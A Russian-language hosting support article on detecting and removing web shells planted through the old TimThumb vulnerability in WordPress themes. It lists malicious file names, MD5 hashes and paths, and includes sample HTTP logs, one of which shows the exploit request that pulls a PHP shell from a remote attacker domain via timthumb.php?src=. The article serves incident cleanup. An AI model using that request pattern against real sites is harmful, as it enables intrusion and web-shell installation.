WordPress: уязвимость TimThumb

TimThumb — утилита, которая используется в темах и плагинах WordPress для изменения размера изображений. В старых версиях TimThumb есть уязвимость, которая позволяет злоумышленникам путем взлома загружать в хостинг-аккаунт вредоносные файлы со своих ресурсов.

Если вы подозреваете, что ваш веб-сайт взломали, ознакомьтесь с информацией ниже. Также советуем прочитать статью Как узнать о взломе веб-сайта и устранить его последствия.

Как определить, что веб-сайт взломали

О некоторых признаках рассказано в статье Как узнать о взломе веб-сайта и устранить его последствия. На взлом через уязвимость TimThumb также указывает наличие файлов следующего вида в каталоге плагинов:

  • external_[md5 hash].php (например, external_dc8e1cb5bf0392f054e59734fa15469b.php);
  • [md5 hash].php (например, 7eebe45bde5168488ac4010f0d65cea8.php).

Другие примеры вы найдете ниже в разделе Хеш-суммы известных вредоносных файлов, вычисленные по MD5.

Также в корневом каталоге веб-сайта могут появиться следующие файлы:

  • x.txt;
  • logx.txt.

Как устранить проблему

Необходимо удалить все вредоносные файлы. Перед этим мы рекомендуем создать резервную копию веб-сайта.

Как найти вредоносные файлы

Как правило, такие файлы изначально загружаются в папку /theme или /plugin с уязвимым файлом TimThumb, а именно в один из следующих каталогов:

  • /tmp
  • /cache
  • /images

Примеры расположения вредоносных файлов:

[webroot]/wp-content/themes/[тема_с_уязвимым_файлом_TimThumb]/cache/images/

Примеры названий вредоносных файлов:

  • ef881b33fba49bd6ad1818062d071a9c.php
  • db648d44074f33a8857066b97290d247.php
  • 3cf739debc9340540c923bbf3b73044b.php
  • dc33a2e36d3179a06278191088c2ef35.php
  • 8377cb73d30655dc2cbf906c9310da56.php
  • eb117b212e2906f52c0a0c9132c6c07a.php
  • a4924ec23939d2410354efbb8d4ddd06.php
  • vvv3.php
  • ea90e1e4d7ba30848f70b13d616c6ed4.php
  • 236268f2a06e4153365b998d13934eb9.php
  • 6a4fa516943e2fa09e3704486075de9f.php
  • 896c4eb4ff2581f6e623db1904b80a44.php
  • wp-images.php

Файлы x.txt и logx.txt содержат информацию о том, когда был создан вредоносный файл и где в хостинг-аккаунте он находится. Эти данные помогут определить, какие файлы нужно удалить и откуда. Однако список файлов, вероятно, будет неполным.

Пример:

День: Чт., 11 апреля 2013 г., 06:21:15 -0700
IP: X.X.X.X
Браузер: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.9.2) Gecko/20100115 Firefox/3.6
URL: /wp-content/themes/[тема_с_уязвимым_файлом_TimThumb]/cache/images/2817f389ac8b52527a0c5e4aabb464aa.php?clone

Какие файлы нужно удалить

Создав резервную копию веб-сайта, удалите следующие файлы:

  • x.txt;
  • logx.txt;
  • external_[md5 hash].php (например, external_dc8e1cb5bf0392f054e59734fa15469b.php);
  • [md5 hash].php (например, 7eebe45bde5168488ac4010f0d65cea8.php);
  • другие вредоносные PHP-файлы, в названиях которых есть хеш-суммы, вычисленные по MD5.

Удалить их можно через FTP или диспетчер файлов на панели управления в хостинг-аккаунте.

Также вам следует:

  • обновить все темы и плагины до последних версий;
  • заменить все файлы TimThumb.php на новую версию.

Техническая информация

Примеры HTTP-логов

x.x.x.x - - [27/Apr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/[тема_с_уязвимым_файлом_TimThumb]/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.s - - [27/Apr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/[тема_с_уязвимым_файлом_TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/[тема_с_уязвимым_файлом_TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/[тема_с_уязвимым_файлом_TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"

Хеш-суммы известных вредоносных файлов, вычисленные по MD5

  • 2c4bcdc6bee98ed4dd55e0d35564d870
  • 10069c51da0c87ad904d602beb9e7770
  • 8855aecb5c45a5bfd962b4086c8ff96a
  • 526a4cf1f66f27a959a39019fdf1fae9
  • 161d2e53c664bd0fe1303017a145b413
  • 39f186a0f55b04c651cbff6756a64ccc
  • f67ca8f0bac08f5e8ccab6013b7acf70
  • 747c7afcda0eef0eff6ed6838494c32
  • cfdf59a58057b62f4707b909bcbd4577

Другие вредоносные файлы

  • wp-script.php
  • wp-images.php
  • vvv3.php
  • data.php

Помогла ли вам эта статья?
Благодарим вас за отзыв. Чтобы связаться с сотрудником службы поддержки клиентов, позвоните по номеру этой службы или воспользуйтесь опцией чата выше.
Мы рады вам помочь! У вас остались вопросы?
Приносим извинения. Расскажите нам, какие затруднения вы испытываете или почему рекомендованное решение не помогло устранить проблему.